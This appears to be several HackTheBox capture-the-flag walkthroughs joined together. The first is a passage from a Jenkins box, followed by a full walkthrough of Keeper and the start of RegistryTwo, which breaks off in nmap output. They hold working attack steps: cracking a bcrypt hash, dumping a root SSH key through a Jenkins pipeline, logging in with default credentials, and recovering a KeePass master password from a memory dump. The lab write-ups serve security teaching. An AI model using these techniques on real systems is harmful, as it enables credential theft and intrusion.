</jenkins.security.LastGrantedAuthoritiesProperty>: No such item ‘ </jenkins.security.LastGrantedAuthoritiesProperty>’ exists.
<jenkins.model.experimentalflags.UserExperimentalFlagsProperty>: No such item ‘ <jenkins.model.experimentalflags.UserExperimentalFlagsProperty>’ exists.
<hudson.model.PaneStatusProperties>: No such item ‘ <hudson.model.PaneStatusProperties>’ exists.
<?xml version='1.1' encoding='UTF-8'?>: No such item ‘<?xml version='1.1' encoding='UTF-8'?>’ exists.
<fullName>jennifer</fullName>: No such item ‘ <fullName>jennifer</fullName>’ exists.
<seed>6841d11dc1de101d</seed>: No such item ‘ <seed>6841d11dc1de101d</seed>’ exists.
<id>jennifer</id>: No such item ‘ <id>jennifer</id>’ exists.
<version>10</version>: No such item ‘ <version>10</version>’ exists.
<tokenStore>: No such item ‘ <tokenStore>’ exists.
<filterExecutors>false</filterExecutors>: No such item ‘ <filterExecutors>false</filterExecutors>’ exists.
<io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>: No such item ‘ <io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>’ exists.
<passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>: No such item ‘ <passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>’ exists.
ERROR: Error occurred while performing this command, see previous stderr output.
It’s scrambled, but the last line is:
<passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>
The hash matches multiple Bcrypt formats. Trying to give it to hashcat
returns that I need to give it a format:
$ hashcat jennifer_hash test --user
hashcat (v6.2.6) starting in autodetect mode
...[-snip]...
The following 4 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
Please specify the hash-mode with -m [hash-mode].
I’m giving it --user
which treats “#jbcrypt” as the username.
The basic bcrypt format works and cracks very quickly:
$ hashcat -m 3200 jennifer_hash --user /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
...[snip]...
$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a:princess
...[snip]...
I get the password “princess”, and this works to log into Jenkins as jennifer.
Even logged in, I still can’t directly access to the private key for root. There is an update option now:
Going into it, there’s a place there the key would be, but it is “Concealed for Confidentiality”:
This is likely used by pipelines to SSH into the host system as root and deploy things.
Interestingly, it is there in a hidden form field (encrypted):
Under “Plugins” in “Manage Jenkins”, there’s are a few. One of interest is the SSH Agent Plugin and SSH Build Agents Plugin:
I’ll show two ways to take this access to Jenkins as root to Root access on Builder. Both of them abuse the setup that has saved an SSH key into Jenkins. This is commonly done so that once the build process is complete, it can put artifacts (like a website) into place on the desired server.
flowchart TD;
A[root access\nto Jenkins]-->B(Decrypt SSH Key\nfrom Jenkins Admin);
A-->C(SSH Agent);
B-->D(root SSH access);
C-->E(Read SSH key\nfrom Host);
E-->D;
A-->F(Dump credential\nin pipeline);
F-->D;
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
I’m able to grab the base64 data from the hidden field and decrypt it very easily using the script console (from the main dashboard, go to “Manage Jenkins” -> Script Console):
On the main page, I’ll create a new job:
On the next page, I’ll give it a name and select Pipeline:
On the next screen, I’ll define the pipeline. I can leave most of it as is, and just fill in the “Pipeline script”. The “try sample pipeline” button will offer a starting format.
pipeline {
agent any
stages {
stage('Hello') {
steps {
echo 'Hello World'
}
}
}
}
If I save this and go back to the job page and click “Build Now”, the job runs. In the “Console Output” of the result, it shows the print:
These docs show how to use the SSH Agent plugin. I’ll paste in their POC as the pipeline:
node {
sshagent (credentials: ['deploy-dev']) {
sh 'ssh -o StrictHostKeyChecking=no -l cloudbees 192.168.1.106 uname -a'
}
}
I clearly need to change the IP. I’ll also need to change the “credential”. The docs show that it takes a list of strings. Trying with “root” fails:
Looking at the credential, it seems the ID is actually just “1”:
I’ll update to that:
And it works:
I’ve successfully run commands on the host.
I’ll update the command from uname -a
to find /root
. In this build, it returns a full read of all the files in /root
:
I could read root.txt
, but I’ll grab that SSH private key instead, changing the command to cat /root/.ssh/id_rsa
:
It’s the same key as the previous method.
If the pipeline can use the SSH key to get on to the host system as root, then it has access to the SSH key itself (I’ve already shown it can decrypt it). This post talks about dumping credentials. There’s a good bit in the post about how to get it to print the credential unmasked. With a bunch of attempts and troubleshooting, I end up with:
When I run that, it prints the SSH key.
Regardless of how I get it, with the recovered key (and permissions set to 600), I can SSH as root into Builder:
oxdf@hacky$ vim ~/keys/builder-root
oxdf@hacky$ chmod 600 ~/keys/builder-root
oxdf@hacky$ ssh -i ~/keys/builder-root root@10.10.11.10
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-94-generic x86_64)
...[snip]...
root@builder:~#
And get root.txt
:
root@builder:~# cat root.txt
a0957a94************************
###
]]>Keeper is a relatively simple box focused on a helpdesk running Request Tracker and with an admin using KeePass. I’ll use default creds to get into the RT instance and find creds for a user in their profile. That user is troubleshooting a KeePass issue with a memory dump. I’ll exploit CVE-2022-32784 to get the master password from the dump, which provides access to a root SSH key in Putty format. I’ll convert it to OpenSSH format and get root access.
Name | Keeper Play on HackTheBox |
---|---|
Release Date | 12 Aug 2023 |
Retire Date | 10 Feb 2024 |
OS | Linux |
Base Points | Easy [20] |
Rated Difficulty | |
Radar Graph | |
00:08:18 | |
00:31:02 | |
Creator |
nmap
finds two open TCP ports, SSH (22) and HTTP (80):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.227
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-04 00:47 EST
Nmap scan report for 10.10.11.227
Host is up (0.094s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 6.90 seconds
oxdf@hacky$ nmap -p 22,80 -sCV 10.10.11.227
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-04 00:48 EST
Nmap scan report for 10.10.11.227
Host is up (0.094s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.12 seconds
Based on the OpenSSH version, the host is likely running Ubuntu 22.04 jammy.
Visiting http://10.10.11.227
returns a plain page with a single link:
I’ll take this opportunity to brute force for any other subdomains on keeper.htb
with the command:
ffuf -u http://10.10.11.227 -H "Host: FUZZ.keeper.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -ac -mc all
It doesn’t find anything. I’ll add keeper.htb
and tickets.keeper.htb
to my /etc/hosts
file:
10.10.11.227 keeper.htb tickets.keeper.htb
keeper.htb
just returns the same page:
oxdf@hacky$ curl keeper.htb
<html>
<body>
<a href="http://tickets.keeper.htb/rt/">To raise an IT support ticket, please visit tickets.keeper.htb/rt/</a>
</body>
</html>
The site presents an instance of Request Tracker (RT), a free ticketing system:
Without creds, there’s not much else to explore here.
The version of RT is given in the page footer as 4.4.4. A quick search for vulnerabilities in this version didn’t turn up anything too interesting.
The HTTP response headers show nginx:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: RT_SID_tickets.keeper.htb.80=ceaad720182f6b18aea0764ad0c0486b; path=/rt; HttpOnly
Date: Sun, 04 Feb 2024 12:39:56 GMT
Cache-control: no-cache
Pragma: no-cache
X-Frame-Options: DENY
Content-Length: 4236
There’s a cookie set on first visiting the RT page. Nothing else of interest.
Given that this is a known piece of free software, I’m going to skip the directory brute force for now.
Searching for the default creds for RT shows root:password:
Those work here!
Logging in provides access to the dashboard:
There aren’t any tickets appearing in the categories it’s trying to show. There is one Queue, General, which has one new ticket. Clicking on that shows it’s an issue with Keepass:
The ticket history gives a bit more information:
There’s an issue with Keepass, and the lnorgaard user has a crashdumb for the root user.
Clicking on the user shows details for the user, but nothing new:
However, as root, I can edit the user (button first from the left in the menu):
This password works for the lnorgaard user over SSH:
oxdf@hacky$ sshpass -p Welcome2023! ssh lnorgaard@keeper.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
You have mail.
Last login: Tue Aug 8 11:31:22 2023 from 10.10.14.23
lnorgaard@keeper:~$
And I can grab user.txt
:
lnorgaard@keeper:~$ cat user.txt
f8e0a027************************
As mentioned in the ticket, there’s a zip archive in lnorgaard’s home directory:
lnorgaard@keeper:~$ ls
RT30000.zip user.txt
I’ll pull it back to my host using scp
(it’s 84MB, so it takes a minute):
oxdf@hacky$ sshpass -p 'Welcome2023!' scp lnorgaard@keeper.htb:/home/lnorgaard/RT30000.zip .
It has two files in it:
oxdf@hacky$ unzip RT30000.zip
Archive: RT30000.zip
inflating: KeePassDumpFull.dmp
extracting: passcodes.kdbx
oxdf@hacky$ ls -lh passcodes.kdbx KeePassDumpFull.dmp
-rwxrwx--- 1 root vboxsf 242M May 24 2023 KeePassDumpFull.dmp
-rwxrwx--- 1 root vboxsf 3.6K May 24 2023 passcodes.kdbx
There’s a 2023 information disclosure vulnerability in KeepPass such that:
In KeePass 2.x before 2.54, it is possible to recover the cleartext master password from a memory dump, even when a workspace is locked or no longer running. The memory dump can be a KeePass process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system. The first character cannot be recovered. In 2.54, there is different API usage and/or random string insertion for mitigation.
I have a dump of the KeePass memory, so this seems like a good thing to try. I’ll show how to do it from both Linux and Windows.
At the time of Keeper’s release, there was really only one POC exploit on GitHub named keepass-password-dumper in DotNet.
The issue is not that the KeePass key is in memory. It’s that when the user types their password in, the strings that get displayed back end up in memory.
For example, let’s take the password “password”. The first character goes in as a “●” (which is \u25cf
or \xcf\x25
in memory). The next character comes, and it will show up as “●a”. Then the next character will be “●●s”, then “●●●s”, then “●●●●w”, and so on, until we get to “●●●●●●●d”.
The exploits look through memory for strings that start with some number of “●” and then one character, and build out the most likely master key.
I can take a look at this manually using strings
and grep
. With -e S
, strings will look for 8-bit characters, which will include what’s needed for the “●” (though it will show up as “%” in my terminal). Then I can grep
for strings that start with two “●” to see potential matches for the keys being input:
oxdf@hacky$ strings -e S KeePassDumpFull.dmp | grep -a $(printf "%b" "\\xCF\\x25\\xCF\\x25")
%%
%%d
%%d
%%%
%%d
%%d
%%d
%%d
%%d
%%d
%%d
%%d
%%%g
%%%g
%%%%
%%%g
%%%g
%%%g
%%%g
%%%g
%%%g
%%%g
%%%g
%%%%r
%%%%r
%%%%%
%%%%r
%%%%r
%%%%r
%%%%r
%%%%r
%%%%r
%%%%r
%%%%r
%%%%%
%%%%%
%%%%%%
%%%%%
%%%%%
%%%%%
%%%%%
%%%%%
%%%%%
%%%%%
%%%%%
%%%%%%d
%%%%%%d
%%%%%%%
%%%%%%d
%%%%%%d
%%%%%%d
%%%%%%d
%%%%%%d
%%%%%%d
%%%%%%d
%%%%%%d
%%%%%%%
%%%%%%%
%%%%%%%%
%%%%%%%
%%%%%%%
%%%%%%%
%%%%%%%
%%%%%%%
%%%%%%%
%%%%%%%
%%%%%%%
%%%%%%%%m
%%%%%%%%m
%%%%%%%%%
%%%%%%%%m
%%%%%%%%m
%%%%%%%%m
%%%%%%%%m
%%%%%%%%m
%%%%%%%%m
%%%%%%%%m
%%%%%%%%m
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%%
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%e
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%%
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%d
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%%
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%f
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%%
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%l
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%d
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%e
%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%
This method is crude, but I can see the third character is likely “d”, and then “g” then “r”. This is what the exploit POCs will do, but a bit smarter to find the most likely key.
From a Windows VM, the exploit is rather straight forward. I’ll clone the repo to my host and go into that directory (if git
isn’t installed in your Windows VM, you can also download the ZIP from GitHub and unzip it):
PS C:\Users\0xdf > git clone https://github.com/vdohney/keepass-password-dumper
Cloning into 'keepass-password-dumper'...
remote: Enumerating objects: 111, done.
remote: Counting objects: 100% (111/111), done.
remote: Compressing objects: 100% (79/79), done.
remote: Total 111 (delta 61), reused 67 (delta 28), pack-reused 0
Receiving objects: 100% (111/111), 200.08 KiB | 3.45 MiB/s, done.
Resolving deltas: 100% (61/61), done.
PS C:\Users\0xdf > cd .\keepass-password-dumper\
Then I just need to dotnet run [dump]
:
PS C:\Users\0xdf\keepass-password-dumper > dotnet run Z:\hackthebox\keeper-10.10.11.227\KeePassDumpFull.dmp
...[snip]...
Password candidates (character positions):
Unknown characters are displayed as "●"
1.: ●
2.: ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M,
3.: d,
4.: g,
5.: r,
6.: ø,
7.: d,
8.: ,
9.: m,
10.: e,
11.: d,
12.: ,
13.: f,
14.: l,
15.: ø,
16.: d,
17.: e,
Combined: ●{ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M}dgrød med fløde
That’s most of the password, with the first character missing and options for the second.
Many people seem to say this is not possible from Linux, and that just isn’t true. It does matter that I have dotnet
installed, and the correct runtime version. I had a really tricky time getting that working in my Ubuntu VM. Following these instructions seemed to work to get dotnet
8.0 installed:
oxdf@hacky$ dotnet --list-runtimes
Microsoft.AspNetCore.App 8.0.1 [/usr/share/dotnet/shared/Microsoft.AspNetCore.App]
Microsoft.NETCore.App 8.0.1 [/usr/share/dotnet/shared/Microsoft.NETCore.App]
Running the exploit (going into the exploit directory and running dotnet run [path to dump]
) returns an error:
oxdf@hacky$ dotnet run ~/hackthebox/keeper-10.10.11.227/KeePassDumpFull.dmp
You must install or update .NET to run this application.
App: /opt/keepass-password-dumper/bin/Debug/net7.0/keepass_password_dumper
Architecture: x64
Framework: 'Microsoft.NETCore.App', version '7.0.0' (x64)
.NET location: /usr/share/dotnet
The following frameworks were found:
8.0.1 at [/usr/share/dotnet/shared/Microsoft.NETCore.App]
Learn more:
https://aka.ms/dotnet/app-launch-failed
To install missing framework, download:
https://aka.ms/dotnet-core-applaunch?framework=Microsoft.NETCore.App&framework_version=7.0.0&arch=x64&rid=linux-x64&os=ubuntu.22.04
It seems like I should just be able to install the v7 runtime, but I couldn’t get that to work.
This is a great case to switch to Docker. I asked ChatGPT for the right container:
I’ll run that container (the first time it needs to pull the image down to my host), and it drops me at a root shell:
oxdf@hacky$ docker run --rm -it -v $(pwd):/data mcr.microsoft.com/dotnet/sdk:7.0.100
Unable to find image 'mcr.microsoft.com/dotnet/sdk:7.0.100' locally
7.0.100: Pulling from dotnet/sdk
025c56f98b67: Pull complete
b7bdfde7680c: Pull complete
0722d9f841b1: Pull complete
d16b6cbfeee6: Pull complete
e0fa390bde6c: Pull complete
d37a20633344: Pull complete
e18b62ec28b8: Pull complete
65b988e004de: Pull complete
Digest: sha256:c6c842afe9350ac32fe23188b81d3233a6aebc33d0a569d565f928c4ff8966e1
Status: Downloaded newer image for mcr.microsoft.com/dotnet/sdk:7.0.100
root@8af1c7b7c189:/#
The -v $(pwd):/data
will mount the current directory (where the dump is) into the container in /data
. I’ll clone the exploit and go into that directory:
root@8af1c7b7c189:/# git clone https://github.com/vdohney/keepass-password-dumper
Cloning into 'keepass-password-dumper'...
remote: Enumerating objects: 111, done.
remote: Counting objects: 100% (111/111), done.
remote: Compressing objects: 100% (79/79), done.
remote: Total 111 (delta 61), reused 67 (delta 28), pack-reused 0
Receiving objects: 100% (111/111), 200.08 KiB | 4.55 MiB/s, done.
Resolving deltas: 100% (61/61), done.
root@8af1c7b7c189:/# cd keepass-password-dumper/
root@8af1c7b7c189:/keepass-password-dumper#
Now the exploit runs fine:
root@8af1c7b7c189:/keepass-password-dumper# dotnet run /data/KeePassDumpFull.dmp
...[snip]...
Password candidates (character positions):
Unknown characters are displayed as "●"
1.: ●
2.: ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M,
3.: d,
4.: g,
5.: r,
6.: ø,
7.: d,
8.: ,
9.: m,
10.: e,
11.: d,
12.: ,
13.: f,
14.: l,
15.: ø,
16.: d,
17.: e,
Combined: ●{ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M}dgrød med fløde
That’s the same output as above.
Since the release of Keeper, many Python versions of this exploit have come out. I had a hard time finding one that worked as nicely as the DotNet version. For example, this one will get most of the password:
oxdf@hacky$ python keepass_dump/keepass_dump.py -f KeePassDumpFull.dmp
[*] Searching for masterkey characters
[-] Couldn't find jump points in file. Scanning with slower method.
[*] 0: {UNKNOWN}
[*] 2: d
[*] 3: g
[*] 4: r
[*] 6: d
[*] 7:
[*] 8: m
[*] 9: e
[*] 10: d
[*] 11:
[*] 12: f
[*] 13: l
[*] 15: d
[*] 16: e
[*] Extracted: {UNKNOWN}dgrd med flde
It knows it doesn’t know the 0 char, but it also skips the 1, 5, and 14 char as well (5 and 14 show up as “ø” in the original POC). Still, it’s enough to continue.
The exploit has a limitation of not getting the first character. The DotNet version also gives a list of possibilities for the second character, and gets the rest. Searching for the string minus the first two characters is enough to find a known phrase:
It’s adding a “rø” to the front, which fits the pattern. Even the less complete output from the Python script works here:
That password works to get into the passcodes.kdbx
file using kpcli
(apt install kpcli
):
oxdf@hacky$ kpcli --kdb passcodes.kdbx
Please provide the master password: *************************
KeePass CLI (kpcli) v3.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/>
There are two entries in the passcodes/Network
folder:
kpcli:/> ls passcodes/
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
kpcli:/> ls passcodes/Network/
=== Entries ===
0. keeper.htb (Ticketing Server)
1. Ticketing System
I’ll go into that directory:
kpcli:/> cd passcodes/Network/
kpcli:/passcodes/Network>
show
with -f
will show the passwords. For example:
kpcli:/passcodes/Network> show -f 1
Title: Ticketing System
Uname: lnorgaard
Pass: Welcome2023!
URL:
Notes: http://tickets.keeper.htb
The more interesting on is the SSH key for the server:
kpcli:/passcodes/Network> show -f 0
Title: keeper.htb (Ticketing Server)
Uname: root
Pass: F4><3K0nd!
URL:
Notes: PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
...[snip]...
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
To use this key on Linux, I’ll need to convert it to a format that openssh can understand. I’ll need putty tools (sudo apt install putty-tools
). I’ll save everything in the “Notes” section to a file, and make sure to remove all the leading whitespace from each line.
Then I’ll convert it:
oxdf@hacky$ puttygen root-putty.key -O private-openssh -o ~/keys/keeper-root
Now it works:
oxdf@hacky$ ssh -i ~/keys/keeper-root root@keeper.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
...[snip]...
root@keeper:~#
And I’ll grab root.txt
:
root@keeper:~# cat root.txt
c930d7c0************************
RegistryTwo is a very difficult machine focusing on exploiting Java applications. At the start, there’s a Docker Registry and auth server that I’ll use to get an image and find a Java War file that runs the webserver. Enumeration and reversing show multiple vulnerabilities including nginx/Tomcat issues, mass assignment, and session manipulation. I’ll chain those together to get a foothold in the production container. From there, I’ll create a rogue Java RMI client to get file list and read on the host, where I find creds to get a shell. To escalate to root, I’ll wait for the RMI server to restart, and start a rogue server to listen on the port before it can. My server will abuse a process for scanning files with ClamAV and get file read and eventually a shell. In Beyond Root, I’ll go over some unintended paths, and look at the nginx configuration that allows for dynamic creation of different website virtual hosts.
Name | RegistryTwo Play on HackTheBox |
---|---|
Release Date | 22 Jul 2023 |
Retire Date | 03 Feb 2024 |
OS | Linux |
Base Points | Insane [50] |
Rated Difficulty | |
Radar Graph | |
13:18:26 | |
14:54:29 | |
Creator |
nmap
finds four open TCP ports, SSH (22) and three HTTPS (443, 5000, 5001):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.223
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-26 08:01 EST
Nmap scan report for 10.10.11.223
Host is up (0.11s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE
22/tcp open ssh
443/tcp open https
5000/tcp open upnp
5001/tcp open commplex-link
Nmap done: 1 IP address (1 host up) scanned in 13.57 seconds
oxdf@hacky$ nmap -p 22,443,5000,5001 -sCV 10.10.11.223
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-26 08:03 EST
Nmap scan report for 10.10.11.223
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fa:b0:03:98:7e:60:c2:f3:11:82:27:a1:35:77:9f:d3 (RSA)
| 256 f2:59:06:dc:33:b0:9f:a3:5e:b7:63:ff:61:35:9d:c5 (ECDSA)
|_ 256 e3:ac:ab:ea:2b:d6:8e:f4:1f:b0:7b:05:0a:69:a5:37 (ED25519)
443/tcp open ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to https://www.webhosting.htb/
| ssl-cert: Subject: organizationName=free-hosting/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2023-02-01T20:19:22
|_Not valid after: 2024-02-01T20:19:22
5000/tcp open ssl/http Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: commonName=*.webhosting.htb/organizationName=Acme, Inc./stateOrProvinceName=GD/countryName=CN
| Subject Alternative Name: DNS:webhosting.htb, DNS:webhosting.htb
| Not valid before: 2023-03-26T21:32:06
|_Not valid after: 2024-03-25T21:32:06
5001/tcp open ssl/commplex-link?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Fri, 26 Jan 2024 19:38:36 GMT
| Content-Length: 10
| found
| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Date: Fri, 26 Jan 2024 19:38:06 GMT
| Content-Length: 26
|_ <h1>Acme auth server</h1>
| ssl-cert: Subject: commonName=*.webhosting.htb/organizationName=Acme, Inc./stateOrProvinceName=GD/countryName=CN
| Subject Alternative Name: DNS:webhosting.htb, DNS:webhosting.htb
| Not valid before: 2023-03-26T21:32:06
|_Not valid after: 2024-03-25T21:32:06
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| h2
|_ http/1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5001-TCP:V=7.80%T=SSL%I=7%D=1/26%Time=65B3AD9E%P=x86_64-pc-linux-gn
SF:u%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(GetRequest,8E,"HTTP/1\.0\x20200\x20OK\r\nContent-Ty
SF:pe:\x20text/html;\x20charset=utf-8\r\nDate:\x20Fri,\x2026\x20Jan\x20202
SF:4\x2019:38:06\x20GMT\r\nContent-Length:\x2026\r\n\r\n<h1>Acme\x20auth\x
SF:20server</h1>\n")%r(HTTPOptions,8E,"HTTP/1\.0\x20200\x20OK\r\nContent-T
SF:ype:\x20text/html;\x20charset=utf-8\r\nDate:\x20Fri,\x2026\x20Jan\x2020
SF:24\x2019:38:06\x20GMT\r\nContent-Length:\x2026\r\n\r\n<h1>Acme\x20auth\
SF:x20server</h1>\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request
SF:\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20clo
SF:se\r\n\r\n400\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x2
SF:0Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection
SF::\x20close\r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=ut
SF:f-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalSe
SF:rverCookie,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nC
SF:ontent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\
SF:n\r\n400\x20Bad\x20Request")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20
SF:Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:
SF:\x20close\r\n\r\n400\x20Bad\x20Request")%r(FourOhFourRequest,A7,"HTTP/1
SF:\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20text/plain;\x20charset=u
SF:tf-8\r\nX-Content-Type-Options:\x20nosniff\r\nDate:\x20Fri,\x2026\x20Ja
SF:n\x202024\x2019:38:36\x20GMT\r\nContent-Length:\x2010\r\n\r\nNot\x20fou
